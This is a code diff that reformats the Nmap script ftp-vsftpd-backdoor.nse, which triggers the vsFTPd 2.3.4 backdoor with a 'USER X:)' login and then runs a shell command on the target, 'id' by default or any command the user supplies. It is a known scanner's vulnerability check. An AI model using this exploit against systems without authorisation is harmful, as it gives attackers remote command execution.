o [NSE] Clean indentation and make some variables local.

2025-12-15 12:19:02 +00:00 · 2011-07-05 16:01:03 +00:00
parent 21abe501ea
commit e7d45910d9
1 changed files with 62 additions and 65 deletions
--- a/scripts/ftp-vsftpd-backdoor.nse
+++ b/scripts/ftp-vsftpd-backdoor.nse
@@ -1,6 +1,3 @@
-- -*- mode: lua -*-
-- vim: set filetype=lua :
-
 description = [[
 Tests for the presence of the vsFTPd 2.3.4 backdoor reported on 2011-07-04. This
 script attempts to exploit the backdoor using the innocuous <code>id</code>
@@ -41,17 +38,17 @@ local CMD_FTP = "USER X:)\r\nPASS X\r\n"
 local CMD_SHELL_ID = "id"

 portrule = function (host, port)
-	-- Check if version detection knows what FTP server this is.
-	if port.version.product ~= nil and port.version.product ~= "vsftpd" then
-		return false
-	end
+  -- Check if version detection knows what FTP server this is.
+  if port.version.product ~= nil and port.version.product ~= "vsftpd" then
+    return false
+  end

-	-- Check if version detection knows what version of FTP server this is.
-	if port.version.version ~= nil and port.version.version ~= "2.3.4" then
-		return false
-	end
+  -- Check if version detection knows what version of FTP server this is.
+  if port.version.version ~= nil and port.version.version ~= "2.3.4" then
+    return false
+  end

-       return shortport.port_or_service(21, "ftp")(host, port)
+  return shortport.port_or_service(21, "ftp")(host, port)
 end

 local function finish_ftp(socket, status, message)
@@ -92,13 +89,13 @@ local function check_backdoor(host, shell_cmd)
    if shell_cmd ~= CMD_SHELL_ID then
      status, ret = socket:send(shell_cmd.."\n")
      if not status then
-      	return finish_ftp(socket, false, "failed to send shell command")
+        return finish_ftp(socket, false, "failed to send shell command")
      end
      status, ret = socket:receive_lines(1)
      if not status then
-      	return finish_ftp(socket, false,
-      	          string.format("failed to read shell commands results: %s",
-      	                        ret))
+        return finish_ftp(socket, false,
+                  string.format("failed to read shell commands results: %s",
+                                ret))
      end
    end
  end
@@ -107,59 +104,59 @@ local function check_backdoor(host, shell_cmd)
 end

 action = function(host, port)
-	-- Get script arguments.
-	local cmd = stdnse.get_script_args("ftp-vsftpd-backdoor.cmd") or
-	        stdnse.get_script_args("exploit.cmd") or CMD_SHELL_ID
+  -- Get script arguments.
+  local cmd = stdnse.get_script_args("ftp-vsftpd-backdoor.cmd") or
+                stdnse.get_script_args("exploit.cmd") or CMD_SHELL_ID

-        local results = {
-	    "This installation has been backdoored: VULNERABLE",
-	    "Command: " .. cmd,
-	}
+  local results = {
+    "This installation has been backdoored: VULNERABLE",
+    "Command: " .. cmd,
+  }

-        -- check to see if the vsFTPd backdoor was already triggered
-        local status, ret = check_backdoor(host, cmd)
-        if status then
-          table.insert(results, string.format("Results: %s", ret))
-	  return stdnse.format_output(true, results)
-        end
+  -- check to see if the vsFTPd backdoor was already triggered
+  local status, ret = check_backdoor(host, cmd)
+  if status then
+    table.insert(results, string.format("Results: %s", ret))
+    return stdnse.format_output(true, results)
+  end

-	-- Create socket.
-	local sock, err = ftp.connect(host, port,
-	                              {recv_before = false,
-	                              timeout = 8000})
-	if not sock then
-          stdnse.print_debug(1, "%s: can't connect: %s",
-                             SCRIPT_NAME, err)
-          return nil
-        end
-	        
-	-- Read banner.
-	buffer = stdnse.make_buffer(sock, "\r?\n")
-	local code, message = ftp.read_reply(buffer)
-	if not code then
-		stdnse.print_debug(1, "%s: can't read banner: %s",
-		                   SCRIPT_NAME, message)
-		sock:close()
-		return nil
-	end
+  -- Create socket.
+  local sock, err = ftp.connect(host, port,
+                                {recv_before = false,
+                                timeout = 8000})
+  if not sock then
+    stdnse.print_debug(1, "%s: can't connect: %s",
+                          SCRIPT_NAME, err)
+    return nil
+  end

-        status, ret = sock:send(CMD_FTP .. "\r\n")
-        if not status then
-          stdnse.print_debug(1, "%s: failed to send privilege escalation command: %s",
-                             SCRIPT_NAME, ret)
-          return nil
-        end
+  -- Read banner.
+  local buffer = stdnse.make_buffer(sock, "\r?\n")
+  local code, message = ftp.read_reply(buffer)
+  if not code then
+    stdnse.print_debug(1, "%s: can't read banner: %s",
+                          SCRIPT_NAME, message)
+    sock:close()
+    return nil
+  end

-        stdnse.sleep(1)
-        -- check if vsFTPd was backdoored
-        local status, ret = check_backdoor(host, cmd)
-        if not status then
-          stdnse.print_debug(1, "%s: %s", SCRIPT_NAME, ret)
-          return nil
-        end
+  status, ret = sock:send(CMD_FTP .. "\r\n")
+  if not status then
+    stdnse.print_debug(1, "%s: failed to send privilege escalation command: %s",
+                          SCRIPT_NAME, ret)
+    return nil
+  end

-        -- delay ftp socket cleaning
-        sock:close()
-        table.insert(results, string.format("Results: %s", ret))
-	return stdnse.format_output(true, results)
+  stdnse.sleep(1)
+  -- check if vsFTPd was backdoored
+  status, ret = check_backdoor(host, cmd)
+  if not status then
+    stdnse.print_debug(1, "%s: %s", SCRIPT_NAME, ret)
+    return nil
+  end
+
+  -- delay ftp socket cleaning
+  sock:close()
+  table.insert(results, string.format("Results: %s", ret))
+  return stdnse.format_output(true, results)
 end